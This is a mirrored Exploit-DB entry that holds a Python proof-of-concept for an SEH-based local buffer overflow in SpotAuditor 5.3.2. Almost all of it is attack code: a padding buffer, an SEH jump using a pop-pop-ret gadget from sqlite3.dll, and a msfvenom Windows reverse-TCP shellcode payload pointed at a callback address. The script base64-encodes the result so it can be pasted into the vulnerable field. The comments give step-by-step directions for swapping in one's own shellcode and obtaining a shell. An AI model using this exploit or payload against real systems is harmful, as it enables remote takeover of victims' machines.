SpotAuditor 5.3.2 – ‘Base64’ Local Buffer Overflow (SEH)

  • 作者: Kirill Nikolaev
    日期: 2019-12-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47759/
  • # Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)
    # Exploit Author: Kirill Nikolaev
    # Date: 2019-12-06
    # Vulnerable Software: SpotAuditor
    # Vendor Homepage: http://www.nsauditor.com/
    # Version: 5.3.2
    # Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
    # Tested Windows 7 SP1 x86
    
    # PoC
    # 1. Download and install SpotAuditor
    # 2. Change shellcode in python script to yours
    # 3. Generate payload with python script
    # 4. Run the software "Tools -> Base64 Encrypted Password
    # 5. Take a shell
    # Original DOS exploit https://www.exploit-db.com/exploits/47719
    
    #!/usr/bin/env python
    
    import base64
    print ("[+] Thank you for choosing our company")
    print ("[+] Local Buffer Overflow (SEH) in SpotAuditor 5.3.2")
    print ("[+] Created By Kirill Nikolaev")
    print ("[+] Generate payload,check, that you take your shellcode")
    print ("")
    head='A'*1024
    #eb0c-jmp across a few bytes with seh address
    jmp_across='\x41\x41\xeb\x0c'
    #0x61e0b194 : pop ebx # pop ebp # ret|{PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.15.2 (C:\Program Files\Nsasoft\SpotAuditor\sqlite3.dll)
    seh='\x94\xb1\xe0\x61'
    header_for_shellcode='\x41'*10
    #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.58.1 LPORT=4444 -f py EXITFUNC=thread -b '\x00'
    buf = ""
    buf += b"\xbd\x7a\xfe\x84\xdd\xdb\xc9\xd9\x74\x24\xf4\x58\x31"
    buf += b"\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\x12\xf0\x66"
    buf += b"\x28\x1e\xe4\xe5\xd3\xde\xf5\x89\x5a\x3b\xc4\x89\x39"
    buf += b"\x48\x77\x3a\x49\x1c\x74\xb1\x1f\xb4\x0f\xb7\xb7\xbb"
    buf += b"\xb8\x72\xee\xf2\x39\x2e\xd2\x95\xb9\x2d\x07\x75\x83"
    buf += b"\xfd\x5a\x74\xc4\xe0\x97\x24\x9d\x6f\x05\xd8\xaa\x3a"
    buf += b"\x96\x53\xe0\xab\x9e\x80\xb1\xca\x8f\x17\xc9\x94\x0f"
    buf += b"\x96\x1e\xad\x19\x80\x43\x88\xd0\x3b\xb7\x66\xe3\xed"
    buf += b"\x89\x87\x48\xd0\x25\x7a\x90\x15\x81\x65\xe7\x6f\xf1"
    buf += b"\x18\xf0\xb4\x8b\xc6\x75\x2e\x2b\x8c\x2e\x8a\xcd\x41"
    buf += b"\xa8\x59\xc1\x2e\xbe\x05\xc6\xb1\x13\x3e\xf2\x3a\x92"
    buf += b"\x90\x72\x78\xb1\x34\xde\xda\xd8\x6d\xba\x8d\xe5\x6d"
    buf += b"\x65\x71\x40\xe6\x88\x66\xf9\xa5\xc4\x4b\x30\x55\x15"
    buf += b"\xc4\x43\x26\x27\x4b\xf8\xa0\x0b\x04\x26\x37\x6b\x3f"
    buf += b"\x9e\xa7\x92\xc0\xdf\xee\x50\x94\x8f\x98\x71\x95\x5b"
    buf += b"\x58\x7d\x40\xcb\x08\xd1\x3b\xac\xf8\x91\xeb\x44\x12"
    buf += b"\x1e\xd3\x75\x1d\xf4\x7c\x1f\xe4\x9f\x42\x48\xdc\x5e"
    buf += b"\x2b\x8b\x20\x70\xf7\x02\xc6\x18\x17\x43\x51\xb5\x8e"
    buf += b"\xce\x29\x24\x4e\xc5\x54\x66\xc4\xea\xa9\x29\x2d\x86"
    buf += b"\xb9\xde\xdd\xdd\xe3\x49\xe1\xcb\x8b\x16\x70\x90\x4b"
    buf += b"\x50\x69\x0f\x1c\x35\x5f\x46\xc8\xab\xc6\xf0\xee\x31"
    buf += b"\x9e\x3b\xaa\xed\x63\xc5\x33\x63\xdf\xe1\x23\xbd\xe0"
    buf += b"\xad\x17\x11\xb7\x7b\xc1\xd7\x61\xca\xbb\x81\xde\x84"
    buf += b"\x2b\x57\x2d\x17\x2d\x58\x78\xe1\xd1\xe9\xd5\xb4\xee"
    buf += b"\xc6\xb1\x30\x97\x3a\x22\xbe\x42\xff\x42\x5d\x46\x0a"
    buf += b"\xeb\xf8\x03\xb7\x76\xfb\xfe\xf4\x8e\x78\x0a\x85\x74"
    buf += b"\x60\x7f\x80\x31\x26\x6c\xf8\x2a\xc3\x92\xaf\x4b\xc6"
    tail='B'*(5000-1028-4-10-len(buf))
    shellcode=head+jmp_across+seh+header_for_shellcode+buf
    print (base64.b64encode(shellcode))
    
    
    --
    Best regards,
    Kirill Nikolaev
    Penetration Tester